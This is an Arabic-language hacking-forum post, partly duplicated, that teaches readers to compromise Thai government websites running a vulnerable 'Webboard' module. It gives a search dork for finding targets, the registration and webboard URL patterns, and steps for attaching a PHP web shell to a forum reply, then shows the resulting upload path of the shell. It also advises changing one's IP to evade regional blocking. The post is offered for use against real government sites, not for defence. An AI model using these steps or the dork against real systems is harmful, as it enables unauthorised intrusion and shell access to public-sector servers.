ثغرة خطيرة لاختراق المواقع الحكومية (Webboard)
[FONT="]السلام عليكم ورحمة الله وبركاته[/FONT][FONT="].
ثغرة خطيرة مصابة بها مواقع حكومية كثيرة تمكننا من رفع الشيل
Dork:
رابط التسجيل
بعد ذلك نعود الى الصفحة الرئيسية للمنتدى:
نختار أحد المواضيع لنضيف الرد:
أثناء كتابة الرد يمكننا إرفاق الشيل كما في الصورة:
[/FONT][FONT="]
--------------------------------------------------------------------------
بعد ذلك نعود إلى الموضوع لنشاهد الرد ونتحصل على رابط الشيل كما في الصورة:
والرابط يكون مثل هذا:
مبروك !
ملاحظة: يجب تغيير الأيبي لأن الكثير من المواقع الحكومية محضورة في بعض البلدان العربية
بالتوفيق
[/FONT]
ثغرة خطيرة مصابة بها مواقع حكومية كثيرة تمكننا من رفع الشيل
Dork:
كود:
site:go.th inurl:name=member+file=index
كود:
http://www.xxxxx.go.th/index.php?name=member&file=index
http://www.xxxxx.go.th/?name=member&file=index
كود:
http://www.xxxxx.go.th/index.php?name=webboard
http://www.xxxxx.go.th/?name=webboard
كود:
http://www.xxxxx.go.th/index.php?name=webboard&file=read&id=49
http://www.xxxxx.go.th/?name=webboard&file=read&id=49[/FONT][FONT="]
--------------------------------------------------------------------------
بعد ذلك نعود إلى الموضوع لنشاهد الرد ونتحصل على رابط الشيل كما في الصورة:
والرابط يكون مثل هذا:
كود:
http://www.xxxxx.go.th/webboard_upload/1340890810_madspot.phpملاحظة: يجب تغيير الأيبي لأن الكثير من المواقع الحكومية محضورة في بعض البلدان العربية
بالتوفيق
[/FONT]
اسم الموضوع : ثغرة خطيرة لاختراق المواقع الحكومية (Webboard)
|
المصدر : قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات
